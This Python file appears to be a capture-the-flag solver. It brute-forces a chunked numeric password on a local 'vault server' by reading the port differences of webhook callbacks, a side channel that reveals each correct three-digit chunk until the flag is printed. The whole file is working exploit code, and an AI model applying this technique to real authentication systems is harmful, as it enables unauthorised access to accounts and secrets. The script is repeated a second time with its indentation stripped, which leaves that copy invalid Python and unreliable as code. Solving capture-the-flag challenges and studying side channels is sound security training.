lukesteensen/solver.py

## solver.py
import sys
import json
import socket
import requests
from time import sleep

# set up a socket for accepting webhook responses
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(("0.0.0.0", 9000))
s.settimeout(2)
s.listen(1)

# checks password with vault server at localhost:3000
# uses the socket we just set up at port 9000 for webhook
# returns difference in ports and last port used
def check_password(password, last_port):
    data = { 'password': password,
             'webhooks': ['localhost:9000'] }
    r = requests.post("http://localhost:3000", data=json.dumps(data))
    if '"success": true' in r.text:
        print "flag is", password
        sys.exit()
    client, (host, port) = s.accept()
    client.close()
    difference = port - last_port
    return difference, port

# concatenate our chunks array into a string
def cat(chunks):
    return ''.join(str(x).zfill(3) for x in chunks)

last_port = 0                  # initialize to 0 so that first run is ignored
chunk = [ 000, 000, 000, 000 ] # chunked password we want to check
baseline = 3                   # initialize to port difference when no chunks are correct
i = 0                          # chunk we are currently working on
verify = 0                     # number of times this chunk has returned good response

while i < len(chunk):

    difference, last_port = check_password(cat(chunk), last_port)
    print "trying", cat(chunk), "- difference is", difference

    if difference == baseline:  # chunk is bad
        chunk[i] = (chunk[i] + 1) % 1000
        verify = 0
    elif difference == baseline + 1:  # chunk seems good
        if verify > 2: # requiring more verification is more reliable
            print "chunk", i, "is", chunk[i]
            i += 1
            baseline += 1
            verify = 0
        else:
            verify += 1
	import sys
	import json
	import socket
	import requests
	from time import sleep

	# set up a socket for accepting webhook responses
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
	s.bind(("0.0.0.0", 9000))
	s.settimeout(2)
	s.listen(1)

	# checks password with vault server at localhost:3000
	# uses the socket we just set up at port 9000 for webhook
	# returns difference in ports and last port used
	def check_password(password, last_port):
	data = { 'password': password,
	'webhooks': ['localhost:9000'] }
	r = requests.post("http://localhost:3000", data=json.dumps(data))
	if '"success": true' in r.text:
	print "flag is", password
	sys.exit()
	client, (host, port) = s.accept()
	client.close()
	difference = port - last_port
	return difference, port

	# concatenate our chunks array into a string
	def cat(chunks):
	return ''.join(str(x).zfill(3) for x in chunks)

	last_port = 0 # initialize to 0 so that first run is ignored
	chunk = [ 000, 000, 000, 000 ] # chunked password we want to check
	baseline = 3 # initialize to port difference when no chunks are correct
	i = 0 # chunk we are currently working on
	verify = 0 # number of times this chunk has returned good response

	while i < len(chunk):

	difference, last_port = check_password(cat(chunk), last_port)
	print "trying", cat(chunk), "- difference is", difference

	if difference == baseline: # chunk is bad
	chunk[i] = (chunk[i] + 1) % 1000
	verify = 0
	elif difference == baseline + 1: # chunk seems good
	if verify > 2: # requiring more verification is more reliable
	print "chunk", i, "is", chunk[i]
	i += 1
	baseline += 1
	verify = 0
	else:
	verify += 1